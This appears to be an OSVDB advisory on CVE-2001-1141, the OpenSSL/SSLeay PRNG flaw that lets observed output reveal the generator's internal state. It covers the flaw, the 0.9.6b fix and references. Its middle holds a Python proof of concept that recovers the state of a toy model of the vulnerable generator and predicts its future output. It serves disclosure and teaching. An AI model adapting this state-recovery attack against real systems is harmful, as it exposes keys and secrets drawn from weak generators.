OpenSSL PRNG Information Disclosure

2001-07-10T00:00:00
ID OSVDB:853
Type osvdb
Reporter Markku-Juhani O. Saarinen (markku-juhani.saarinen@nokia.com)
Modified 2001-07-10T00:00:00

Description

Vulnerability Description

The pseudo-random number generator (PRNG) in OpenSSL contains a cryptographic design error: an attacker who obtains the output of a few hundred consecutive short PRNG requests can reconstruct the PRNG's internal state and therefore predict all subsequent output, compromising any keys, nonces or other secrets drawn from it. The flaw originated in SSLeay and is present in its derivative toolkits, of which OpenSSL is one.

Technical Description

OpenSSL's PRNG (crypto/rand/md_rand.c in the source) uses a hash function both to update its internal secret state and to generate output. The default hash is SHA-1. The internal secret state consists of two variables: a chaining variable called "md", sized to the output of the selected hash (20 bytes for SHA-1), and a large circular buffer called "state" (1023 bytes) that stores additional entropy. On every iteration the contents of "md" are replaced by a fresh hash output, and "state" is walked in a circular fashion, a few bytes at a time.

Vulnerable versions compute the new "md" as the hash of one half of its previous value together with other data, including bytes taken from "state". Unfortunately, the half of "md" fed back into the hash is the same half that is returned to the caller as PRNG output, so every output block hands the attacker the chaining input of the next iteration. In addition, the number of "state" bytes mixed into an iteration equals the number of output bytes requested, so a one-byte request mixes in a single state byte and leaves only 256 possibilities for the unknown part of the hash input. Together these make an exhaustive search trivial: one request of half the digest length (10 bytes with SHA-1) reveals the chaining half of "md", and a following run of one-byte requests long enough to walk through all of "state" lets the attacker recover the state byte by byte, reconstructing the complete internal state and with it all future output.
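The following is an added example, not OpenSSL's md_rand.c: a toy model of the generator with a switch between the pre-0.9.6b chaining and the corrected one, plus the byte-by-byte state recovery sketched above run against it. It assumes a shrunken 32-byte "state" (OpenSSL's is 1023 bytes), omits the call counter and caller-buffer bytes the real code also hashes, and assumes the target started at position 0 of the circular buffer; the names MdRand, recover_state, predict and run_attack are this example's own.

```python
"""Toy model of the SSLeay/OpenSSL md_rand.c generator and of the state
recovery described above.  This is an added example, not OpenSSL's code: the
real generator also hashes a call counter (md_c) and the caller's output
buffer, and its state is 1023 bytes; those are dropped or shrunk here so the
search finishes in seconds, and the attack does not depend on them."""
import hashlib

DIGEST = 20          # SHA-1 output length, as in OpenSSL's default build
HALF = DIGEST // 2   # 10 bytes: one half of md
STATE_SIZE = 32      # OpenSSL uses 1023; shrunk so the toy search is quick


def _chain(md: bytes, state_bytes: bytes, vulnerable: bool) -> bytes:
    """One hash step.  The vulnerable code hashed the half of md that had just
    been handed out as output; the fix hashes the other half instead."""
    chain_in = md[HALF:] if vulnerable else md[:HALF]
    return hashlib.sha1(chain_in + state_bytes).digest()


class MdRand:
    """Simplified ssleay_rand_bytes.  'vulnerable' selects the pre-0.9.6b
    behaviour (chain on the output half, consume only as many state bytes
    as output bytes were requested)."""

    def __init__(self, seed: bytes, vulnerable: bool):
        assert len(seed) == STATE_SIZE + DIGEST
        self.state = bytearray(seed[:STATE_SIZE])
        self.md = seed[STATE_SIZE:]
        self.st_idx = 0
        self.vulnerable = vulnerable

    def rand_bytes(self, num: int) -> bytes:
        out = bytearray()
        while num > 0:
            j = min(num, HALF)                        # output bytes this round
            num -= j
            n_state = j if self.vulnerable else HALF  # state bytes hashed
            idx = [(self.st_idx + i) % STATE_SIZE for i in range(n_state)]
            self.md = _chain(self.md, bytes(self.state[k] for k in idx),
                             self.vulnerable)
            for i, k in enumerate(idx):               # first half feeds back into state
                self.state[k] ^= self.md[i]
            self.st_idx = (self.st_idx + n_state) % STATE_SIZE
            out += self.md[HALF:HALF + j]             # second half is the output
        return bytes(out)


def recover_state(bootstrap: bytes, singles, start_idx: int = HALF):
    """Attacker side against the vulnerable generator.  'bootstrap' is the
    output of one HALF-byte request: it equals md[HALF:], i.e. exactly the
    chaining input of the next request.  'singles' are the one-byte outputs
    that followed; each of them hashed md[HALF:] plus a single state byte, so
    256 guesses per step cover every case.  A wrong guess survives a one-byte
    check with probability 1/256, so survivors are kept as branches rather
    than assumed unique.  Returns every generator consistent with the
    transcript.  start_idx assumes the target started at st_idx 0; only the
    relative position in the circular buffer matters."""
    assert len(bootstrap) == HALF
    # md[:HALF] is unknown but never hashed by the vulnerable code; zero-fill it.
    live = [(bytes(HALF) + bootstrap, {})]
    idx = start_idx
    for out_byte in singles:
        nxt = []
        for md, known in live:
            for guess in range(256):
                md2 = _chain(md, bytes([guess]), True)
                if md2[HALF] == out_byte:
                    known2 = dict(known)
                    known2[idx] = guess ^ md2[0]      # value after the feedback XOR
                    nxt.append((md2, known2))
        live = nxt
        idx = (idx + 1) % STATE_SIZE
    clones = []
    for md, known in live:
        if len(known) < STATE_SIZE:
            continue                                  # transcript too short
        g = MdRand(bytes(STATE_SIZE + DIGEST), True)
        g.state = bytearray(known[k] for k in range(STATE_SIZE))
        g.md, g.st_idx = md, idx
        clones.append(g)
    return clones


def predict(clones, check: bytes):
    """Keep only the clones that reproduce 'check', the bytes the target emitted
    right after the transcript; each survivor now runs in lockstep with it."""
    return [g for g in clones if g.rand_bytes(len(check)) == check]


def run_attack(label: bytes, vulnerable: bool) -> dict:
    """End-to-end run.  The target is seeded from 'label' (constructed input,
    not real entropy); the attacker sees one HALF-byte request, STATE_SIZE
    one-byte requests and one 8-byte request, then must predict the next 32."""
    seed = hashlib.sha512(label).digest()[:STATE_SIZE + DIGEST]
    target = MdRand(seed, vulnerable)
    bootstrap = target.rand_bytes(HALF)
    singles = [target.rand_bytes(1)[0] for _ in range(STATE_SIZE)]
    check = target.rand_bytes(8)
    future = target.rand_bytes(32)
    clones = predict(recover_state(bootstrap, singles), check)
    return {"candidates": len(clones),
            "predicted": bool(clones) and clones[0].rand_bytes(32) == future}


if __name__ == "__main__":
    print("0.9.6a-style:", run_attack(b"constructed toy seed", True))
    print("0.9.6b-style:", run_attack(b"constructed toy seed", False))
```

Against the vulnerable variant the search ends with a single clone that reproduces the target's future output; against the corrected variant the same transcript yields no consistent clone, because the output half is no longer the chaining input and each iteration mixes in ten unknown state bytes (2^80 guesses) rather than one. The branching in recover_state is the edge case a practitioner has to handle: a one-byte check leaves about one false survivor per step, and those false branches die out only as later bytes are checked.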

Solution Description

Upgrade to version 0.9.6b or later, which has been reported to fix this vulnerability. The fix changes ssleay_rand_bytes so that the half of "md" fed back into the hash is the half that is never returned as output, and so that a full half-digest (10 bytes with SHA-1) of "state" is mixed in on every iteration regardless of how few bytes were requested. The flaw can also be corrected by applying the vendor-supplied patch to OpenSSL versions 0.9.5 through 0.9.6a; versions prior to 0.9.5 must be upgraded. Since the attack needs nothing but observed output, any library built from OpenSSL older than 0.9.6b, or from SSLeay, should be treated as affected (check with "openssl version" for the linked library).

References:

Vendor URL: http://www.openssl.org/
Nessus Plugin ID: 11060
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0162.html
ISS X-Force ID: 6823
Generic Informational URL: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-013.txt.asc
CVE ID: CVE-2001-1141
CERT VU: 131923
Bugtraq ID: 3004